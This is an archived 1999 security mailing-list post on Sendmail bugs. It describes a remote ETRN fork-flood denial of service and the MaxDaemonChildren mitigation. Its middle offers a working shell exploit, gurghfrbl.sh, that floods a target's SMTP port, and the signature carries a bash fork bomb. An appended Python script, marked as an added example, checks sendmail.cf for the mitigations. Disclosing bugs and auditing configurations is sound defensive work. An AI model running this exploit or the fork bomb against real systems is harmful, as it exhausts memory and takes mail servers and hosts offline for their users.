Re: procmail / Sendmail - five bugs

From: Michal Zalewski (lcamtufat_private)
Date: Wed Dec 22 1999 - 13:22:12 PST


    On Tue, 21 Dec 1999, Rob Jones wrote:
    
    > with or without these double-quotes the message is immediately dropped
    > on redhat linux with the message
    
    Oops! Yes, apparently this problem affects all versions of Sendmail, but
    only with a .cf file left from 8.8.x or previous releases. In fact, obsolete
    .cf files are quite common if Sendmail has been updated by the administrator -
    'by hand' or from binary packages like .rpm - as people have not enough
    time and good will to rebuild config files when replacing the binary
    (especially if there are some extensions/custom .cf settings).
    
    So, another thing. There's a nice remote Sendmail ETRN DoS. When the ETRN
    command is read by Sendmail (it shouldn't be allowed at all, IMHO), it
    calls fork(). The parent process generates no output - only child-generated
    output is sent, so the parent won't be notified on send()/write() failure. If
    we drop the connection (after sending a lot of ETRNs), the parent process will
    get stuck, repeatedly doing fork() ... sleep(5), till the end of the ETRNs read into
    the input buffer is reached. This allows us to spawn any amount of 'unusable'
    sendmail children, hanging for a long period of time - and it can be done
    using low network bandwidth and resources. Direct result - all server
    memory consumed (causing Linux 2.0 kernels to crash with messages like 'no
    memory for sendmail', 'no memory for klogd' etc). Unlike connect()
    flooding, this attack generates low traffic, only one connection at a
    time, and seems to be deadly harmful, unless something like:
    
    # maximum number of children we allow at one time
    O MaxDaemonChildren=15
    
    is defined in sendmail.cf (as far as I recall, this option is disabled by
    default). The exploit follows (written for its beautiful name):
    
    -- gurghfrbl.sh --
    #!/bin/sh
    
    TARGET=localhost
    COUNT=150
    SLEEP=1
    
    echo "gurghfrbl.sh - (c) lcamtuf '99"
    echo -n "Tickle"
    
    while :; do
      echo -n "."
      (
        NIC=0
        while [ "$NIC" -lt "$COUNT" ]; do
          echo "ETRN x"
        done
      ) | telnet $TARGET 25 &>/dev/null &
      sleep $SLEEP
      killall -9 telnet &>/dev/null
    done
    -- EOF --
    
    _______________________________________________________________________
    Michal Zalewski [lcamtufat_private] [link / marchew] [dione.ids.pl SYSADM]
    [Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
    [voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 501 4000 69]
    To iterate is human, to recurse divine [P. Deutsch]
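A defender's check for the mitigation the post names, as an added example that is not part of the original message: it parses the `O Name=value` option lines of a sendmail.cf and reports whether MaxDaemonChildren is set and whether ETRN is disabled via the `noetrn` PrivacyOptions flag (a sendmail flag not mentioned in the post). Both .cf fragments are constructed samples, not real configurations.

```python
import re

# Constructed sample sendmail.cf fragments (not taken from any real host).
WEAK_CF = """\
# sendmail.cf kept from an old 8.8.x install (constructed example)
O PrivacyOptions=authwarnings
O QueueDirectory=/var/spool/mqueue
"""

HARDENED_CF = """\
# sendmail.cf with the mitigations discussed in the thread (constructed example)
O PrivacyOptions=authwarnings,noetrn
# maximum number of children we allow at one time
O MaxDaemonChildren=15
"""

# Long-form option lines look like "O MaxDaemonChildren=15"; comments start with '#'.
OPTION_RE = re.compile(r"^O\s*([A-Za-z]+)\s*=\s*(.*?)\s*$")


def parse_options(cf_text):
    """Return {name: value} for every 'O Name=value' line in a sendmail.cf."""
    opts = {}
    for line in cf_text.splitlines():
        m = OPTION_RE.match(line)
        if m:
            opts[m.group(1)] = m.group(2)
    return opts


def audit_etrn_dos(cf_text):
    """List the missing mitigations for the ETRN fork() flood; empty means both are present."""
    opts = parse_options(cf_text)
    findings = []
    mdc = opts.get("MaxDaemonChildren")
    # Unset, non-numeric or zero means no cap on children a single client can force.
    if mdc is None or not mdc.isdigit() or int(mdc) <= 0:
        findings.append("MaxDaemonChildren unset: forked children are unbounded")
    privacy = {p.strip() for p in opts.get("PrivacyOptions", "").split(",")}
    if "noetrn" not in privacy:
        findings.append("PrivacyOptions lacks noetrn: ETRN accepted from any client")
    return findings


if __name__ == "__main__":
    for name, cf in (("weak", WEAK_CF), ("hardened", HARDENED_CF)):
        print(name, audit_etrn_dos(cf) or ["ok"])
```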
    